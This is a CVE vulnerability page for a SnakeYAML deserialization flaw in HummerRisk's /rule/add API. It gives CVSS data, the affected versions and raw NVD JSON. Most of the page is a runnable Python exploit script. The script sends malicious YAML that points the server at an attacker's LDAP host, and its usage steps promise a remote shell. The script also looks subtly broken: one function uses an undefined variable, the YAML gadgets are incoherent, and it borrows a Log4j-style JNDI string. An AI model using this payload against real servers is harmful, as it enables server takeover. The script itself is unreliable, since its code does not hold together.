Security Vulnerability Report
中文
CVE-2025-63721 CVSS 8.8 HIGH

CVE-2025-63721

Published: 2025-12-08 17:16:20
Last Modified: 2025-12-11 15:15:49
Source: [email protected]

Description

HummerRisk thru v1.5.0 is using a vulnerable Snakeyaml component, allowing attackers with normal user privileges to hit the /rule/add API and thereby achieve RCE and take over the server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hummerrisk:hummerrisk:*:*:*:*:*:*:*:* - VULNERABLE
HummerRisk < 1.5.1
HummerRisk v1.5.0
HummerRisk v1.5.0及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63721 PoC - HummerRisk Snakeyaml RCE # Target: HummerRisk <= v1.5.0 # Endpoint: POST /rule/add import requests import argparse import base64 from urllib.parse import quote def generate_yaml_payload(cmd): """ Generate malicious YAML payload for Snakeyaml deserialization This exploits JNDI injection via javax.naming.InitialContext """ # The attacker-controlled LDAP server address jndi_url = f"ldap://{attacker_ip}:1389/Exploit" # Malicious YAML payload using Snakeyaml tag payload = f""" !!javax.naming.InitialContext !!jdk.nashorn.internal.objects.NativeString cka: !!binary | {base64.b64encode(cmd.encode()).decode()} """ return payload def exploit(target_url, attacker_ip, attacker_port=1389): """ Exploit CVE-2025-63721 Args: target_url: Base URL of vulnerable HummerRisk instance attacker_ip: Attacker's IP for LDAP callback attacker_port: LDAP server port (default: 1389) """ # Construct JNDI reference for LDAP injection jndi_payload = f"${{jndi:ldap://{attacker_ip}:{attacker_port}/Exploit}}" # Malicious YAML that triggers Snakeyaml deserialization yaml_payload = f""" !!javax.naming.InitialContext !!java.lang.String data: !!binary | {base64.b64encode(jndi_payload.encode()).decode()} """ # Target API endpoint endpoint = f"{target_url.rstrip('/')}/rule/add" # HTTP Headers headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Request body with malicious YAML data = { 'ruleContent': yaml_payload, 'ruleName': 'malicious_rule', 'ruleType': 'custom' } print(f"[*] Targeting: {endpoint}") print(f"[*] LDAP Server: {attacker_ip}:{attacker_port}") print(f"[*] Sending malicious payload...") try: response = requests.post(endpoint, data=data, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-63721 Exploit') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-i', '--ip', required=True, help='Attacker IP for LDAP callback') parser.add_argument('-p', '--port', default=1389, type=int, help='LDAP port') args = parser.parse_args() exploit(args.target, args.ip, args.port) # Usage: # 1. Start JNDIExploit or marshalsec LDAP server on attacker machine # 2. Run: python cve-2025-63721.py -t http://target:8080 -i attacker_ip -p 1389 # 3. Receive shell callback on LDAP server

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63721", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:20.230", "lastModified": "2025-12-11T15:15:49.320", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "HummerRisk thru v1.5.0 is using a vulnerable Snakeyaml component, allowing attackers with normal user privileges to hit the /rule/add API and thereby achieve RCE and take over the server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hummerrisk:hummerrisk:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.5.0", "matchCriteriaId": "9BAA1F0C-C093-44BC-B790-BD0FB41BE3A1"}]}]}], "references": [{"url": "https://gist.github.com/k1ng0fic3/e8c8c9353fff8fa95e2c2952587e9266", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/k1ng0fic3/secrisk/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/k1ng0fic3/e8c8c9353fff8fa95e2c2952587e9266", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/k1ng0fic3/secrisk/blob/main/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.